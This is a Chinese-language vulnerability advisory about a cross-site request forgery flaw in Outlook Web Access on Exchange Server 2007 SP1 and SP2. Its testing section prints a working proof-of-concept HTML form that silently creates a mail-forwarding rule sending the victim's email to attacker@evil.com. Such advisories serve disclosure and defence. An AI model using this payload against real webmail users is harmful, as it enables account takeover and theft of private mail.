受影响系统:
Microsoft Exchange Server 2007 SP2
Microsoft Exchange Server 2007 SP1
不受影响系统:
Microsoft Exchange Server 2007 SP3
描述:
Microsoft Exchange Server是一款流行的邮件服务器,Outlook Web Access是Exchange中用于通过Web浏览器读取和发送邮件的工具。
Outlook Web Access在认证用户期间没有充分地验证HTTP请求中的REFERER,没有对HTTP管理CSRF nonce和令牌,用户在有效OWA会话中所访问的网页可以触发提交给OWA的有效请求,导致完全入侵其他用户的邮件账号。
<*来源:Rosario Valotta
链接:http://sites.google.com/site/tentacoloviola/pwning-corporate-webmails
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<form name="myform" method="post" enctype="text/plain" action=https://webmail.mycorporation.com/owa/ev.owa?oeh=1&ns=Rule&ev=Save>
<input type="hidden" name=’<params><Id></Id><Name>Test</Name><RecpA4><item><Rcp DN="attacker@evil.com" EM="attacker@evil.com" RT="SMTP" AO="3"></Rcp></item></RecpA4><Actions><item><rca t="4"></rca></item></Actions></params>′ value="">
</form>
建议:
厂商补丁:
Microsoft
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
0 条评论。